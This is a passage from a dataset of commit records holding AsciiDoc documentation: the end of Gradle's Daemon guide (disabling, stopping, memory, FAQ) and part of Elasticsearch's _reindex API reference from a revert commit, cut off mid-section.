connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<embedding.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dafa78ec63a3e7c20f510d95fef286308444430d","subject":"Revert \"Doc: \/_reindex: Add a note about the source size parameter\"","message":"Revert \"Doc: \/_reindex: Add a note about the source size parameter\"\n\nThis reverts commit 4de284866875b987110df66229fb7c7d0b9cd4d8.\n","repos":"scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra5-rc,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,liweinan0423\/elasticsearch,masaruh\/elasticsearch,trangvh\/elasticsearch,maddin2016\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,dpursehouse\/elasticsearch,trangvh\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,avikurapati\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,zkidkid\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,rajanm\/elasticsearch,zkidkid\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,sreeramjayan\/elasticsearch,dongjoon-hyun\/elasticsearch,ricardocerq\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,myelin\/elasticsearch,zkidkid\/elasticsearch,fred84\/elasticsearch,ricardocerq\/elasticsearch,palecur\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,ricardocerq\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,sneivandt\/elasticsearch,JackyMai\/elasticsearch,gmarz\/elasticsearch,myelin\/elasticsearch,bawse\/elasticsearch,awislowski\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,avikurapati\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,winstonewert\/elasticsearch,cwurm\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,awislowski\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,girirajsharma\/elasticsearch,markwalkom\/elasticsearch,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,girirajsharma\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,sreeramjayan\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,gfyoung\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,obourgain\/elasticsearch,zkidkid\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,maddin2016\/elasticsearch,JervyShi\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,cwurm\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,geidies\/elasticsearch,cwurm\/elasticsearch,nazarewk\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,liweinan0423\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,gmarz\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,shreejay\/elasticsearch,camilojd\/elasticsearch,dongjoon-hyun\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,sreeramjayan\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,trangvh\/elasticsearch,ricardocerq\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,i-am-Nathan\/elasticsearch,dpursehouse\/elasticsearch,pozhidaevak\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,camilojd\/elasticsearch,sreeramjayan\/elasticsearch,i-am-Nathan\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,JervyShi\/elasticsearch,palecur\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra5-rc,coding0011\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elassandra,cwurm\/elasticsearch,girirajsharma\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,avikurapati\/elasticsearch,cwurm\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,shreejay\/elasticsearch,fforbeck\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,ricardocerq\/elasticsearch,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,awislowski\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,IanvsPoplicola\/elasticsearch,nilabhsagar\/elasticsearch,avikurapati\/elasticsearch,robin13\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,girirajsharma\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,trangvh\/elasticsearch,nezirus\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,alexshadow007\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,artnowo\/elasticsearch,palecur\/elasticsearch,gfyoung\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,dongjoon-hyun\/elasticsearch,scottsom\/elasticsearch,dpursehouse\/elasticsearch,wangtuo\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra,dpursehouse\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassandra,glefloch\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/docs\/reindex.asciidoc","new_file":"docs\/reference\/docs\/reindex.asciidoc","new_contents":"[[docs-reindex]]\n== Reindex API\n\nexperimental[The reindex API is new and should still be considered experimental. The API may change in ways that are not backwards compatible]\n\nThe most basic form of `_reindex` just copies documents from one index to another.\nThis will copy documents from the `twitter` index into the `new_twitter` index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:big_twitter]\n\nThat will return something like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 147,\n \"timed_out\": false,\n \"created\": 120,\n \"updated\": 0,\n \"batches\": 1,\n \"version_conflicts\": 0,\n \"noops\": 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0,\n \"requests_per_second\": \"unlimited\",\n \"throttled_until_millis\": 0,\n \"total\": 120,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\" : 147\/\"took\" : \"$body.took\"\/]\n\nJust like <<docs-update-by-query,`_update_by_query`>>, `_reindex` gets a\nsnapshot of the source index but its target must be a **different** index so\nversion conflicts are unlikely. The `dest` element can be configured like the\nindex API to control optimistic concurrency control. Just leaving out\n`version_type` (as above) or setting it to `internal` will cause Elasticsearch\nto blindly dump documents into the target, overwriting any that happen to have\nthe same type and id:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"internal\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSetting `version_type` to `external` will cause Elasticsearch to preserve the\n`version` from the source, create any documents that are missing, and update\nany documents that have an older version in the destination index than they do\nin the source index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSettings `op_type` to `create` will cause `_reindex` to only create missing\ndocuments in the target index. All existing documents will cause a version\nconflict:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nBy default version conflicts abort the `_reindex` process but you can just\ncount them by settings `\"conflicts\": \"proceed\"` in the request body:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"conflicts\": \"proceed\",\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nYou can limit the documents by adding a type to the `source` or by adding a\nquery. This will only copy ++tweet++'s made by `kimchy` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\",\n \"query\": {\n \"term\": {\n \"user\": \"kimchy\"\n }\n }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\n`index` and `type` in `source` can both be lists, allowing you to copy from\nlots of sources in one request. This will copy documents from the `tweet` and\n`post` types in the `twitter` and `blog` index. It'd include the `post` type in\nthe `twitter` index and the `tweet` type in the `blog` index. If you want to be\nmore specific you'll need to use the `query`. It also makes no effort to handle\nID collisions. The target index will remain valid but it's not easy to predict\nwhich document will survive because the iteration order isn't well defined.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": [\"twitter\", \"blog\"],\n \"type\": [\"tweet\", \"post\"]\n },\n \"dest\": {\n \"index\": \"all_together\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT twitter\\nPUT blog\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nIt's also possible to limit the number of processed documents by setting\n`size`. This will only copy a single document from `twitter` to\n`new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 1,\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nIf you want a particular set of documents from the twitter index you'll\nneed to sort. Sorting makes the scroll less efficient but in some contexts\nit's worth it. If possible, prefer a more selective query to `size` and `sort`.\nThis will copy 10000 documents from `twitter` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 10000,\n \"source\": {\n \"index\": \"twitter\",\n \"sort\": { \"date\": \"desc\" }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nLike `_update_by_query`, `_reindex` supports a script that modifies the\ndocument. Unlike `_update_by_query`, the script is allowed to modify the\ndocument's metadata. This example bumps the version of the source document:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n },\n \"script\": {\n \"script\": \"if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nThink of the possibilities! Just be careful! With great power.... You can\nchange:\n\n * `_id`\n * `_type`\n * `_index`\n * `_version`\n * `_routing`\n * `_parent`\n * `_timestamp`\n * `_ttl`\n\nSetting `_version` to `null` or clearing it from the `ctx` map is just like not\nsending the version in an indexing request. It will cause that document to be\noverwritten in the target index regardless of the version on the target or the\nversion type you use in the `_reindex` request.\n\nBy default if `_reindex` sees a document with routing then the routing is\npreserved unless it's changed by the script. You can set `routing` on the\n`dest` request to change this:\n\n`keep`::\n\nSets the routing on the bulk request sent for each match to the routing on\nthe match. The default.\n\n`discard`::\n\nSets the routing on the bulk request sent for each match to null.\n\n`=<some text>`::\n\nSets the routing on the bulk request sent for each match to all text after\nthe `=`.\n\nFor example, you can use the following request to copy all documents from\nthe `source` index with the company name `cat` into the `dest` index with\nrouting set to `cat`.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"query\": {\n \"match\": {\n \"company\": \"cat\"\n }\n }\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nBy default `_reindex` uses scroll batches of 1000. You can change the\nbatch size with the `size` field in the `source` element:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"size\": 100\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nReindex can also use the <<ingest>> feature by specifying a\n`pipeline` like this:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\"\n },\n \"dest\": {\n \"index\": \"dest\",\n \"pipeline\": \"some_ingest_pipeline\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\n[float]\n=== URL Parameters\n\nIn addition to the standard parameters like `pretty`, the 